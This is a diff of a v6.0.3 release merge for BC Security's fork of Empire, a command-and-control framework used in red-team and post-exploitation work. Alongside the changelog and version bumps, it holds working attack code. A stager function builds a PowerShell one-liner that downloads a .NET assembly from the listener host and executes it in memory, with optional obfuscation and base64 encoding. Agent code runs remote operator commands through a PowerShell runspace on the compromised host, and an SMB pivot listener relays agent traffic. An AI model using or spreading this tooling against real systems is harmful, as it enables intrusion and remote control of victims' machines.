Merge pull request #780 from BC-SECURITY/release/6.0.3

v6.0.3 into main

Author: Cx01N

CHANGELOG.md

@@ -14,6 +14,14 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
 ## [Unreleased]
 
+## [6.0.3] - 2025-04-24
+
+-   Fixed SMB listener not sending start task
+-   Fixed ironpython shell commands running as cmd instead of powershell
+-   Added literal interpretation for shell commands to ironpython agent
+-   Fixed multi_launcher not being able to build smb agent
+-   Removed linux as go agent option as its not implemented yet
+
 ## [6.0.2] - 2025-04-07
 
 -   Fixed issue where C# modules on powershell agent would be improperly formatted
@@ -1094,7 +1102,9 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 -   Updated shellcoderdi to newest version (@Cx01N)
 -   Added a Nim launcher (@Hubbl3)
 
-[Unreleased]: https://github.com/BC-SECURITY/Empire-Sponsors/compare/v6.0.2...HEAD
+[Unreleased]: https://github.com/BC-SECURITY/Empire-Sponsors/compare/v6.0.3...HEAD
+
+[6.0.3]: https://github.com/BC-SECURITY/Empire-Sponsors/compare/v6.0.2...v6.0.3
 
 [6.0.2]: https://github.com/BC-SECURITY/Empire-Sponsors/compare/v6.0.1...v6.0.2
 

empire/server/common/empire.py

@@ -34,7 +34,7 @@
 if TYPE_CHECKING:
     from socket import SocketIO
 
-VERSION = "6.0.2 BC Security Fork"
+VERSION = "6.0.3 BC Security Fork"
 
 log = logging.getLogger(__name__)
 

empire/server/core/stager_generation_service.py

@@ -188,30 +188,28 @@ def generate_exe_oneliner(
         self, language, obfuscate, obfuscation_command, encode, listener_name
     ):
         """
-        Generate a oneliner for a executable
+        Generate an oneliner for an executable
         """
         listener = self.listener_service.get_active_listener_by_name(listener_name)
 
         if getattr(listener, "parent_listener", None) is not None:
             hop = listener.options["Name"]["Value"]
             while getattr(listener, "parent_listener", None) is not None:
                 listener = self.listener_service.get_active_listener_by_name(
-                    listener.parent_listener.name
+                    listener.parent_listener_name
                 )
         else:
             hop = ""
         host = listener.options["Host"]["Value"]
         launcher_front = listener.options["Launcher"]["Value"]
 
-        # Encoded launcher requires a sleep
         launcher = f"""
         $wc=New-Object System.Net.WebClient;
         $bytes=$wc.DownloadData("{host}/download/{language}/{hop}");
         $assembly=[Reflection.Assembly]::load($bytes);
         $assembly.GetType("Program").GetMethod("Main").Invoke($null, $null);
         """
 
-        # Remove comments and make one line
         launcher = helpers.strip_powershell_comments(launcher)
         launcher = data_util.ps_convert_to_oneliner(launcher)
 
@@ -220,12 +218,10 @@ def generate_exe_oneliner(
                 launcher,
                 obfuscation_command=obfuscation_command,
             )
-        # base64 encode the stager and return it
         if encode and (
             (not obfuscate) or ("launcher" not in obfuscation_command.lower())
         ):
             return helpers.powershell_launcher(launcher, launcher_front)
-        # otherwise return the case-randomized stager
         return launcher
 
     def generate_go_exe_oneliner(

empire/server/data/agent/ironpython_agent.py

@@ -1457,6 +1457,8 @@ def directory_listing(self, path):
 
     # additional implementation methods
     def run_command(self, command, cmdargs=None):
+        from System.Management.Automation import PowerShell, Runspaces
+
         if re.compile("(ls|dir)").match(command):
             if cmdargs == None or not os.path.exists(cmdargs):
                 cmdargs = "."
@@ -1552,8 +1554,21 @@ def run_command(self, command, cmdargs=None):
         else:
             if cmdargs is None:
                 cmdargs = ""
-            cmd = "{} {}".format(command, cmdargs)
-            return os.popen(cmd).read()
+            full_command = "{} {}".format(command, cmdargs)
+
+            if full_command.lower().startswith("shell "):
+                full_command = full_command[6:].strip()
+
+            ps = PowerShell.Create()
+            ps.AddScript(full_command + " | Out-String")
+
+            results = ps.Invoke()
+
+            output = []
+            for result in results:
+                output.append(str(result))
+
+            return "\n".join(output)
 
     def get_file_part(self, filePath, offset=0, chunkSize=512000, base64=True):
         if not os.path.exists(filePath):

empire/server/data/agent/stagers/smb/smb.py

@@ -34,7 +34,6 @@ def __init__(self):
             hasattr(ssl, '_create_unverified_context') and ssl._create_unverified_context() or None
 
         self.session_id = b'00000000'
-        self.session_id = self.generate_session_id()
         self.key = None
         self.headers = self.initialize_headers(self.profile)
         self.packet_handler = ExtendedPacketHandler(None, staging_key=self.staging_key, session_id=self.session_id, headers=self.headers, server=self.server, taskURIs=self.taskURIs)

empire/server/listeners/smb.py

@@ -415,7 +415,7 @@ def start(self):
             name = self.options["Name"]["Value"]
             tempOptions = copy.deepcopy(self.options)
 
-            with SessionLocal() as db:
+            with SessionLocal.begin() as db:
                 agent = self.mainMenu.agentsv2.get_by_id(
                     db, self.options["Agent"]["Value"]
                 )
@@ -427,14 +427,14 @@ def start(self):
                     db, agent, name + "|" + self.options["PipeName"]["Value"]
                 )
                 self.parent_agent = agent.session_id
-                parent_listener_name = agent.listener
+                self.parent_listener_name = agent.listener
 
                 log.info(
                     f"{self.options['Agent']['Value']}: SMB pivot server task request send to agent"
                 )
 
                 self.parent_listener = self.mainMenu.listenersv2.get_by_name(
-                    db, parent_listener_name
+                    db, self.parent_listener_name
                 )
 
                 if not self.parent_listener:

empire/server/stagers/multi/go_exe.py

@@ -30,10 +30,10 @@ def __init__(self, mainMenu):
                 "Value": "Gopire.exe",
             },
             "GOOS": {
-                "Description": "Target operating system (e.g., linux, windows, darwin).",
+                "Description": "Target operating system.",
                 "Required": True,
-                "Value": "linux",
-                "SuggestedValues": ["linux", "windows", "darwin"],
+                "Value": "windows",
+                "SuggestedValues": ["windows"],
                 "Strict": True,
             },
             "GOARCH": {

pyproject.toml

@@ -1,6 +1,6 @@
 [tool.poetry]
 name = "empire-bc-security-fork"
-version = "6.0.2"
+version = "6.0.3"
 description = ""
 authors = ["BC Security <info@bc-security.org>"]
 readme = "README.md"